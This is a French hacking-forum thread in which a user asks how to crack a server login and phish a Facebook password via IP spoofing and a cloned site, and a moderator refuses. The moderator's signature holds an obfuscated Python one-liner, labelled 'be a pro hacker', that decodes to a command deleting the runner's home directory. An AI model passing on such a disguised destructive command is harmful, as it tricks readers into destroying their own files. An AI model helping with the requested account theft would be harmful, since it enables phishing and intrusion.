Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-03-2014 09:52:13

elmaestro
N00b

fail ou méthode pour hacker un id et un mdp d'un serveur

Bonjour,
Quand j'ai trouvé l'adresse ip de la personne qui s'est connecté sur mon compte facebook et quand je veux acceder à ce serveur ça m'affiche ce message .. je sais pas s'il y a une méthode pour pirater son mot de passe et tout.
voila le message ( "A username and password are being requested by http://xxx.xxx.xx.xxx. The site says: "level_15 or view_access" )
pour etre claire la personne n'utilise pas le VPN donc y a pas une  possibilité que l'adresse ip change ou etre fausse.

une autre question svp est ce  que je peux changer mon adresse ip sur kali linux et mettre la meme que l'adresse ip que la personne que je veux hacker et apres avec un clooning de site facebook je pourrai recuperer son id et mdp ?
merci beaucoup et bonne journée wink big_smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-03-2014 10:11:18

spawn
Modérateur

Re : fail ou méthode pour hacker un id et un mdp d'un serveur

non.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 19-03-2014 10:45:58

elmaestro
N00b

Re : fail ou méthode pour hacker un id et un mdp d'un serveur

Merci smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.03 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]